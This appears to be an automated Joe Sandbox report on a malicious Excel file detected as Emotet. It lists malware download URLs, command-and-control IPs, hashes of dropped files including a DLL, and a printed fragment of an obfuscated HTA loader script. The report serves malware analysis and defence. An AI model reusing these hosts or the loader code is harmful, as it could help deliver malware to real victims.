                                https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.protware.commshta.exe, 00000004.00000002.454946718.0000000002E30000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://91.240.118.168/qqw/aas/se.html&Emshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/qqw/aas/se.htmlnmshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://91.240.118.168/qqw/aas/sepowershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://thaireportchannel.com/wppowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168/qqw/aas/se.htmlsmshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://jeffreylubin.igclout.com/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168/qqw/aas/se.htmlC:mshta.exe, 00000004.00000002.454965047.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.452003548.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430447784.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://flybustravel.com/cgi-bin/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://esaci-egypt.com/wp-inclupowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    		unknown
                                    https://algzor.com/wp-includes/ghFXVrGLEh/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://algzor.com/wp-includes/ghFXVrGLEh/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://91.240.118.168/qqw/aas/se.htmlmshtamshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://pcovestudio.com/wp-adminpowershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    207.148.81.119
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    104.131.62.48
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    198.199.98.78
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    194.9.172.107
                                    		unknownunknown
                                    		207992FEELBFRtrue
                                    59.148.253.194
                                    		unknownHong Kong
                                    		9269HKBN-AS-APHongKongBroadbandNetworkLtdHKtrue
                                    74.207.230.120
                                    		unknownUnited States
                                    		63949LINODE-APLinodeLLCUStrue
                                    103.41.204.169
                                    		unknownIndonesia
                                    		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                    85.214.67.203
                                    		unknownGermany
                                    		6724STRATOSTRATOAGDEtrue
                                    191.252.103.16
                                    		unknownBrazil
                                    		27715LocawebServicosdeInternetSABRtrue
                                    168.197.250.14
                                    		unknownArgentina
                                    		264776OmarAnselmoRipollTDCNETARtrue
                                    185.148.168.15
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    66.42.57.149
                                    		unknownUnited States
                                    		20473AS-CHOOPAUStrue
                                    91.240.118.168
                                    		unknownunknown
                                    		49453GLOBALLAYERNLtrue
                                    139.196.72.155
                                    		unknownChina
                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                    217.182.143.207
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    203.153.216.46
                                    		unknownIndonesia
                                    		45291SURF-IDPTSurfindoNetworkIDtrue
                                    159.69.237.188
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    116.124.128.206
                                    		unknownKorea Republic of
                                    		9318SKB-ASSKBroadbandCoLtdKRtrue
                                    37.59.209.141
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    78.46.73.125
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    210.57.209.142
                                    		unknownIndonesia
                                    		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                                    172.67.149.209
                                    		kuyporn.comUnited States
                                    		13335CLOUDFLARENETUSfalse
                                    185.148.168.220
                                    		unknownGermany
                                    		44780EVERSCALE-ASDEtrue
                                    74.208.236.157
                                    		jeffreylubin.igclout.comUnited States
                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                    54.37.228.122
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    185.168.130.138
                                    		unknownUkraine
                                    		49720GIGACLOUD-ASUAtrue
                                    190.90.233.66
                                    		unknownColombia
                                    		18678INTERNEXASAESPCOtrue
                                    142.4.219.173
                                    		unknownCanada
                                    		16276OVHFRtrue
                                    54.38.242.185
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    195.154.146.35
                                    		unknownFrance
                                    		12876OnlineSASFRtrue
                                    195.77.239.39
                                    		unknownSpain
                                    		60493FICOSA-ASEStrue
                                    78.47.204.80
                                    		unknownGermany
                                    		24940HETZNER-ASDEtrue
                                    118.98.72.86
                                    		unknownIndonesia
                                    		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                    37.44.244.177
                                    		unknownGermany
                                    		47583AS-HOSTINGERLTtrue
                                    62.171.178.147
                                    		unknownUnited Kingdom
                                    		51167CONTABODEtrue
                                    128.199.192.135
                                    		unknownUnited Kingdom
                                    		14061DIGITALOCEAN-ASNUStrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:562407
                                    Start date:28.01.2022
                                    Start time:21:03:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 34s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:DETAILS-145.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:20
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@29/9@2/36
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 20.6% (good quality ratio 19.4%)
                                    • Quality average: 72%
                                    • Quality standard deviation: 25.7%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 53
                                    • Number of non-executed functions: 193
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • Execution Graph export aborted for target mshta.exe, PID 2816 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: DETAILS-145.xls

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:07:26API Interceptor57x Sleep call for process: mshta.exe modified
                                    21:07:31API Interceptor435x Sleep call for process: powershell.exe modified
                                    21:07:52API Interceptor127x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    207.148.81.119info_301.xlsGet hashmaliciousBrowse
                                      5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                        gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                          Ylb9.dllGet hashmaliciousBrowse
                                            HXYM4z2.dllGet hashmaliciousBrowse
                                              W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                w87Hl.dllGet hashmaliciousBrowse
                                                  zvb7uw.dllGet hashmaliciousBrowse
                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                      https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                        https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                          Q_2801.xlsGet hashmaliciousBrowse
                                                            X_2801.xlsGet hashmaliciousBrowse
                                                              2026P-2801.xlsGet hashmaliciousBrowse
                                                                Mail_27012022.xlsGet hashmaliciousBrowse
                                                                  gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                      MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                        BR 18833597536.xlsGet hashmaliciousBrowse
                                                                          DOCUMENT_652.xlsGet hashmaliciousBrowse
                                                                            104.131.62.48info_301.xlsGet hashmaliciousBrowse
                                                                              5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                  Ylb9.dllGet hashmaliciousBrowse
                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                      W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                        w87Hl.dllGet hashmaliciousBrowse
                                                                                          zvb7uw.dllGet hashmaliciousBrowse
                                                                                            https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                              https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                  Q_2801.xlsGet hashmaliciousBrowse
                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                      2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                        Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                          gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                            x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                              MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                BR 18833597536.xlsGet hashmaliciousBrowse
                                                                                                                  DOCUMENT_652.xlsGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    kuyporn.comBR 18833597536.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    report_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    comments_175343.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    CT 7839428.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    INFO 388968.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    Fichier-27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    DOCUMENT-8.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    Message 2701.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    02L_78562.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    untitled 667.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    DOCUMENT_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    message_40986562.xlsGet hashmaliciousBrowse
                                                                                                                    • 172.67.149.209
                                                                                                                    PACK-5191097.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    PACK 628.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    message_64956614.xlsGet hashmaliciousBrowse
                                                                                                                    • 104.21.11.177
                                                                                                                    jeffreylubin.igclout.comBR 18833597536.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    report_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    comments_175343.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    CT 7839428.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    INFO 388968.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Fichier-27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT-8.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    Message 2701.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    02L_78562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    untitled 667.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    DOCUMENT_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_40986562.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK-5191097.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    PACK 628.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157
                                                                                                                    message_64956614.xlsGet hashmaliciousBrowse
                                                                                                                    • 74.208.236.157

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    AS-CHOOPAUSinfo_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    5R5Dz9UhFae3QqksIqR.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gqxdiBj7JLMI.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Ylb9.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    HXYM4z2.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    W5Tmx0pFkC6A.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    w87Hl.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    zvb7uw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___lastregaristorante.com_wp-admin_ffdC7ElM2Bn2_Fri_Jan_28_10_48_23_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___oculusvisioncare.com_wp-includes_ZEYDjosbNExFTdu_Fri_Jan_28_10_48_26_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    https___mypurealsystem.com_App_Start_Rhh8lKO_Fri_Jan_28_10_48_15_AM_CST_2022.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Q_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    X_2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mozi.m.3Get hashmaliciousBrowse
                                                                                                                    • 95.179.227.24
                                                                                                                    2026P-2801.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    Mail_27012022.xlsGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    gLbGdSSQmEnKdhkSLJv.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    x6eU6QrnmgTO4svU.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    MrrnzVVCORolbHHw.dllGet hashmaliciousBrowse
                                                                                                                    • 66.42.57.149
                                                                                                                    q5HvnqyamG.xlsGet hashmaliciousBrowse
                                                                                                                    • 149.248.5.128
                                                                                                                    DIGITALOCEAN-ASNUSimedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_14.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    NZW-010122 BNUV-280122.xlsmGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_15.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_2.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_3.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    iMedPub LTD_7.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    iMedPub LTD_8.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    imedpub.xlsGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    info_301.xlsGet hashmaliciousBrowse
                                                                                                                    • 128.199.192.135
                                                                                                                    InnovincConf_1.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    innovinc.org.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135
                                                                                                                    ANFg7r0v2A.dllGet hashmaliciousBrowse
                                                                                                                    • 162.243.175.63
                                                                                                                    Insight Medical Publishing_10.xlsGet hashmaliciousBrowse
                                                                                                                    • 164.90.147.135

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\ProgramData\QWER.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.004121873463284
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMG2UylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnzyDx6BrWt
                                                                                                                    MD5:E2294F5521E781B3E691CB764C5E07AC
                                                                                                                    SHA1:3697DC13629DECE42CA0F437FB0F0A0B0FEEE174
                                                                                                                    SHA-256:358839196733595F91A4574D36DBE91706F40782137F4565FE0ED35EF4AB27BA
                                                                                                                    SHA-512:4C302A258895C3F98578FBF74FDF142B0AD3C0305C50B7B84BBC9B8703CC7CD40AED4402347F19E3049CD9E2767FC23B1E5C4C41243D8DA7BDBACC9C961D98D2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\QWER.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\mshta.exe
                                                                                                                    File Type:data
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):11230
                                                                                                                    Entropy (8bit):6.174353476920402
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:aYVCkQn+a8Ytu3jBoYwMxsybTH8lNQwAB3fEbMH4+juo8w8q0T1fEnXAdZl+gpX:aYUkNa8ZBoYwMDXH8lNbs8BJZl+WX
                                                                                                                    MD5:3CDAF9C34211A5219808433770A34E72
                                                                                                                    SHA1:A16F4AC4AF7E46FF84E330BF50A9B6AA6A9A93EC
                                                                                                                    SHA-256:CD29D9E79ED2874B6597961173BA7EF09B5F2295CF330BFDAEFF84459EBC58FB
                                                                                                                    SHA-512:489E0C619AC80BBE287D8C9C339A11932CB8991EFBD29D536B3D45F9259D325551DF9DC6B1B38DFC4B72051CB05C856C81F9B767CE66A910FE3876927CE657C2
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://91.240.118.168/qqw/aas/se.html
                                                                                                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';vLG487Q2fbnWb=new Array();d3fUhQBfUW303=new Array();d3fUhQBfUW303[0]='c\161\171R%50%32e%37' ;vLG487Q2fbnWb[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.\\.1.6.6.a.r.%.2.0.%.7

                                                                                                                    C:\Users\user\AppData\Local\Temp\54C4.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF632A2497A7AF7BEB.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):2.664554788742027
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YxsINg5+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cML:YY+nBqmIk3hbdlylKsgqopeJBWhZFGk7
                                                                                                                    MD5:534B016025B9A11F0776BBE070BC9EBC
                                                                                                                    SHA1:23D5520395E4BC1DF6ADE5661554F1DD387DB5CA
                                                                                                                    SHA-256:6CE3127C861EB2D24C2CB18AD25C43FB09DC0D15AC4F9C727553C6B30D75BF3D
                                                                                                                    SHA-512:09D74BFD0E1422045B40ED37C12EE5380D319F867977725917CE16567012E25562EDDE24E7334073BB59E81DF766501B54A8FD1B9F5D7E66DF9E84BBD57D124D
                                                                                                                    Malicious:false
                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF82D94E817519DDA2.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
